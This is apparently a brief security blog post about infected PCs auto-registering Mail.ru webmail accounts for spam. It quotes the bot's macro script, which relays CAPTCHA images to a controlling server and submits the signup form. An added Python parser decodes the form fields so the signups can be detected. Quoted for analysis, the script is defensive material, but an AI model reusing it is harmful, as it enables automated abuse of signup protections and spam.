Just an observation, nothing earth-shattering: We’re seeing infected systems being signed up automatically to for spamming.

The spammers use infected machines to sign up for webmail accounts at We saw this about a year and a half ago with Yahoo! Mail accounts. A trivial little script runs which signs the user up:

!GOTO 80
!GOTOLINKTEXT 80 /cgi-bin/signup
!SAVEIMG MY_MACRO_WEB_SERV MY_MACRO_WEB_SERV_PORT /wss/wssa2/uppic.php get_image?id= mailru 1
!SLEEP 200
!GETCODE MY_MACRO_WEB_SERV MY_MACRO_WEB_SERV_PORT /wss/wssa2/piccode.php mailru
!POST 80 /cgi-bin/ reg"
Count [_HIDDEN_]
back [_HIDDEN_]
Username [redacted]
Password [redacted]
Password_Verify [redacted]
Password_Question %CD%EE%EC%E5%F0+%EF%E0%F1%EF%EE%F0%F2a
Password_CustomQuestion [NULL]
Password_Answer [redacted]

Email [NULL]
FirstName Maks
LastName M
BirthDay 9
BirthMonth 9
BirthYear 1965
Sex 1
Mrim.Country 123
Mrim.Region 0
mra1 0
security_image_id [_HIDDEN_]
security_image_answer [PICCODE]
B1 +%C7%E0%F0%E5%E3%E8%F1%F2%F0%E8%F0%EE%E2%E0%F2%FC+%EF%EE%F7%F2%EE%E2%FB%E9+%FF%F9%E8%EA+
!PARSE MY_MACRO_WEB_SERV MY_MACRO_WEB_SERV_PORT /wss/wssa2/check.php msglist?folder 430 5
!GOTO[portions redacted] 80
!GOTO 80
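For analysis, the script above can be treated as data. The following is an added example, not part of the original post or of the bot's tooling: it separates the `!` directives from the form fields, decodes the percent-escaped values, and lists the hard-coded values that would be identical in every signup made with this script. The function names are hypothetical, and the Windows-1251 encoding is an assumption (the post does not state it).

```python
from urllib.parse import unquote_plus

# Lines copied from the script in the post (redactions kept as posted).
SCRIPT = """\
!SAVEIMG MY_MACRO_WEB_SERV MY_MACRO_WEB_SERV_PORT /wss/wssa2/uppic.php get_image?id= mailru 1
!SLEEP 200
!GETCODE MY_MACRO_WEB_SERV MY_MACRO_WEB_SERV_PORT /wss/wssa2/piccode.php mailru
Username [redacted]
Password_Question %CD%EE%EC%E5%F0+%EF%E0%F1%EF%EE%F0%F2a
Email [NULL]
FirstName Maks
LastName M
BirthYear 1965
security_image_id [_HIDDEN_]
security_image_answer [PICCODE]
B1 +%C7%E0%F0%E5%E3%E8%F1%F2%F0%E8%F0%EE%E2%E0%F2%FC+%EF%EE%F7%F2%EE%E2%FB%E9+%FF%F9%E8%EA+
"""

def parse_script(text, encoding="cp1251"):
    """Return (directives, fields); each field is tagged placeholder or static."""
    directives, fields = [], {}
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        if line.startswith("!"):
            # Directive line: verb followed by whitespace-separated arguments.
            verb, *args = line[1:].split()
            directives.append((verb, args))
            continue
        name, _, raw = line.partition(" ")
        if raw.startswith("[") and raw.endswith("]"):
            # Bracketed token: filled in at run time, or redacted in the post.
            fields[name] = ("placeholder", raw)
        else:
            # Assumption: the percent-escapes are Windows-1251 bytes.
            fields[name] = ("static", unquote_plus(raw, encoding=encoding))
    return directives, fields

def static_fingerprint(fields):
    """Hard-coded values, the same in every signup this script performs."""
    return {k: v for k, (kind, v) in fields.items() if kind == "static"}

if __name__ == "__main__":
    directives, fields = parse_script(SCRIPT)
    print([verb for verb, _ in directives])
    for name, value in static_fingerprint(fields).items():
        print(f"{name} = {value!r}")
```

Under the Windows-1251 assumption, `Password_Question` decodes to Russian for "Passport number" and `B1` to "Register mailbox"; the image answer is the only CAPTCHA-related field, and it is a `[PICCODE]` placeholder filled from the `!GETCODE` request.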

Then, they post the account information back to the controlling server:


Alex Eckelberry
(Thanks Adam Thomas)